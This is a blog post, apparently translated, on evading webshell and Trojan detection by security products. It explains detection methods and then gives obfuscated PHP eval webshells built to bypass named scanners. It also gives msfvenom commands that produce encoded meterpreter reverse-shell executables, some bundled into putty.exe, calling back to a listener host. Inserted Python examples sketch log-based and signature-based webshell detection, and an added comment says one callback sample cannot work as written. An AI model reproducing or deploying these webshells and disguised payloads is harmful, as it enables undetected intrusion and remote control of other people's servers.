[Trojan and webshell detection evasion]


Preface

Common cybersecurity interview questions


Topic


1. Evasion requirements, detection technology, evasion techniques, and evasion in practice

Evasion requirements

The ultimate purpose of the designed Trojan is to be uploaded to the target server once it is discovered that the target website has an upload vulnerability, and then to be accessed remotely so as to obtain remote control. However, some websites run protection software such as Security Dog, D-Shield, Security Knight, Guardian God and Cloud Lock. Because this protection software can detect and kill some webshells, a webshell that is to be used for remote control first has to evade it, so that it passes the inspection of the Trojan detection tools.

Detection technology

Currently, the mainstream methods for detecting and killing Trojans are static inspection, dynamic detection, and log detection.

1. Static inspection detects and kills Trojan programs by matching signatures, dangerous functions and Trojan characteristic values. It is fast and convenient and has high accuracy for known Trojan programs. Its disadvantages are a high false positive rate, an inability to find 0day Trojans, and being easy to bypass.

2. Dynamic detection is based on the dynamic characteristics of the Trojan program. Once a Trojan has been uploaded to the server, the attacker will always execute it at some point; the behaviour the Trojan shows while executing is what is meant by its dynamic characteristics.

3. Log detection is implemented through log analysis: it detects abnormal files by analysing a large number of log files and building a request model. Its advantage is that once the website's traffic reaches a certain volume, this detection method has considerable reference value. Its disadvantages are a certain false positive rate and, for very large log volumes, relatively low processing power and efficiency of the detection tool.
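To make the log-detection idea concrete, here is an added example (not code from the original post) that builds the kind of request model described above from a handful of constructed access-log lines and flags paths whose access pattern looks like a webshell client rather than a page that users browse to. The log format, sample lines and the flagging rule (POST-only, single client, never reached via a Referer) are all my assumptions.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format. The lines below are constructed for this example.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2022:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Aug/2022:10:00:02 +0800] "GET /index.php HTTP/1.1" 200 5120 "http://site/" "Mozilla/5.0"
10.0.0.7 - - [01/Aug/2022:10:00:03 +0800] "POST /login.php HTTP/1.1" 302 0 "http://site/index.php" "Mozilla/5.0"
10.0.0.8 - - [01/Aug/2022:10:00:04 +0800] "POST /login.php HTTP/1.1" 302 0 "http://site/index.php" "Mozilla/5.0"
203.0.113.9 - - [01/Aug/2022:10:05:00 +0800] "POST /uploads/1.php HTTP/1.1" 200 120 "-" "python-requests/2.28"
203.0.113.9 - - [01/Aug/2022:10:05:07 +0800] "POST /uploads/1.php HTTP/1.1" 200 860 "-" "python-requests/2.28"
203.0.113.9 - - [01/Aug/2022:10:05:20 +0800] "POST /uploads/1.php HTTP/1.1" 200 4010 "-" "python-requests/2.28"
"""

def build_request_model(log_text):
    """Per-path request model: who requests the path, how, and whether a page linked to it."""
    model = defaultdict(lambda: {"hits": 0, "posts": 0, "no_referer": 0, "ips": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:  # skip lines that do not parse rather than guessing at their fields
            continue
        stats = model[m["path"]]
        stats["hits"] += 1
        stats["ips"].add(m["ip"])
        if m["method"] == "POST":
            stats["posts"] += 1
        if m["referer"] == "-":
            stats["no_referer"] += 1
    return model

def suspicious_paths(model, min_hits=2):
    """Paths that are only ever POSTed to, by a single client, and never reached through a
    link from another page: the access pattern of a webshell client, not of a normal page."""
    flagged = []
    for path, s in model.items():
        if (s["hits"] >= min_hits and s["posts"] == s["hits"]
                and len(s["ips"]) == 1 and s["no_referer"] == s["hits"]):
            flagged.append(path)
    return sorted(flagged)

if __name__ == "__main__":
    print(suspicious_paths(build_request_model(SAMPLE_LOG)))
```

On real traffic the thresholds need tuning per site, which is the false-positive trade-off the section above mentions.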

Evasion tips

1. Trojan programs can be written in a variety of programming languages, and each language has its own characteristics and system functions. So when implementing evasion, first consider using the characteristics of the language itself.
2. Second, use the detection rules of the scanning tool itself to restructure the Trojan program so that it slips past the Trojan scanner.
3. At the same time, consider the encryption and decryption techniques of cryptography to encrypt the source Trojan program and decrypt it at runtime, so as to evade inspection by the Trojan scanner.
The core of Trojan evasion technology lies in "flexibility".

Evasion in practice

A Trojan that has not been modified for evasion looks, for example, like this:

<?php 
  @eval($_POST['123']); 
?>

Webshell evasion:

1. References

Because D-Shield, Security Dog and Guardian God trace the source of the variable executed by the keyword eval, a Trojan is reported as suspicious when the variable to be executed is suspicious data received through POST. To get around this tracing, you can alias the previous variable with & several times and, through a series of assignments, finally concatenate the content to be executed with a backtick string and pass it into eval. The specific implementation is as follows:

<?php 
$b=&$a;
$a=$_POST['123'];
$c=&$b;
eval(`/***aaa***/`.$c);
?>

2. Variable variables

Variable variables are a feature unique to PHP: the name of a variable can itself be held in another variable, so variable names can change dynamically. This feature can be used for Trojan evasion. First define a variable $a and assign it the value 'aa'; then assign the Trojan content to the variable variable $$a (that is, to $aa); finally, when calling eval, simply name $aa as the object to execute. The specific implementation is as follows:

<?php
$a = 'aa';
$$a = $_POST['123'];
eval(`/**123**/`.$aa);
?>

3. Two-dimensional array

For evasion, we can consider putting the one-line Trojan to be executed inside an array to achieve the bypass, for example:

<?php
$b = substr_replace("assexx", "rt", 4); // builds the function name at runtime
$a = array($array = array("" => $b($_POST['123'])));
var_dump($a);
?>

4. Array intersection

While researching evasion we found that the value we want can be obtained through the intersection of two arrays and then used when constructing the Trojan program, for example:

<?php
$a1 = array("a" => "red", "ss" => "green", "c" => "blue", "er" => "hello", "t" => "hey");
$a2 = array("a" => "red", "ss" => "blue", "d" => "pink", "er" => "hellos", "moza" => "good_boy", "t" => "hey");
$result = array_intersect_key($a1, $a2); // take the intersection of the arrays
$a = array_keys($result);               // take the array keys
$man = $a[0].$a[1].$a[2]."t";
$kk = $_POST['q'];
@$man(`/**/`.$kk = $kk);
print_r($a1); // disrupt the rules
?>

This evasion method can bypass most anti-virus software.

5. Callback function

The array_map() callback function returns the array after the user-defined function has been applied to it. The specific usage and parameters of the array_map() function are as follows:

Here we first define a function test, whose first parameter $a is used as the callback function name and whose second parameter $b is used as the parameter of the callback; both are passed to array_map() for execution. Then we call the test function from outside, passing in our callback function name and the callback parameter.

<?php
function test($a, $b) {
    array_map($a, $b);
}
// As posted by the author. Note that eval is a language construct, not a function,
// so array_map() cannot actually invoke it as a callback.
test(eval, array($_POST['123']));
?>

array_filter()
call_user_func_array() // functions that can replace array_map

6. Encoding

Key functions such as eval and assert can be base64-encoded, or spliced together from array elements and then invoked through a callback, and so on.
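From the defender's side, the static inspection described in the detection section and the webshell tricks listed in points 1 to 6 are two views of the same problem, so here is one added example (not code from the original post) that serves both: a small weighted rule scanner for PHP source, run over one-line stand-ins for the post's samples plus a benign file. The rule names, weights, threshold and sample inputs are my own assumptions.

```python
import re

# Weighted regex rules keyed by the tricks discussed above; a hit names the trick.
# Weights are my own choice (assumption): 3 = direct execution of request data,
# 2 = an indirection that only webshells use, 1 = a weak, corroborating signal.
RULES = {
    "direct_eval_of_request":       (3, r"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "request_to_variable_variable": (3, r"\$\$\w+\s*=\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "bare_eval_as_callback":        (3, r"[(,]\s*[\"']?(eval|assert)[\"']?\s*[,)]"),
    "backtick_concat_into_eval":    (2, r"\b(eval|assert)\s*\(\s*`[^`]*`\s*\."),
    "variable_function_on_request": (2, r"@?\$\w+\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "reference_alias_chain":        (1, r"\$\w+\s*=\s*&\s*\$\w+"),
    "request_data_into_array":      (1, r"\barray\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "built_function_name":          (1, r"\b(substr_replace|str_replace|strrev|array_keys|array_intersect_key)\s*\("),
    "decoded_payload":              (1, r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
}
THRESHOLD = 3  # assumption: one strong rule, or several weak ones together, flags the file

def scan_php(source):
    """Return (score, sorted rule names) for one PHP source string."""
    hits = sorted(name for name, (_, pat) in RULES.items() if re.search(pat, source))
    return sum(RULES[n][0] for n in hits), hits

def is_webshell(source):
    return scan_php(source)[0] >= THRESHOLD

# Constructed inputs: one-line stand-ins for the samples in the post, plus a benign file
# that uses array_keys() legitimately, to show the false-positive side of static matching.
SAMPLES = {
    "plain":     "<?php @eval($_POST['123']); ?>",
    "reference": "<?php $b=&$a; $a=$_POST['123']; $c=&$b; eval(`/***aaa***/`.$c); ?>",
    "varvar":    "<?php $a='aa'; $$a=$_POST['123']; eval(`/**123**/`.$aa); ?>",
    "callback":  "<?php function t($a,$b){ array_map($a,$b); } t(eval,array($_POST['123'])); ?>",
    "benign":    "<?php $users = array_keys($config['users']); echo count($users); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        score, hits = scan_php(src)
        print(f"{name:10} score={score} flagged={is_webshell(src)} {hits}")
```

The benign file trips one weak rule but stays under the threshold, while each evasion sample is caught by a rule that keys on the indirection itself rather than on the string "eval($_POST", which is exactly the gap a signature-only scanner leaves.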

Trojan (binary) evasion:

1. msf built-in encoder
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o shell.exe
2. msf bundling with a template executable
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -x putty.exe -f exe -o shell.exe
3. msf built-in encoder + bundling
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o shell.exe
4. backdoor-factory
5. unicorn

Summary

This issue mainly introduces some methods for evading Trojan detection.

Origin blog.csdn.net/qq_61872115/article/details/126130811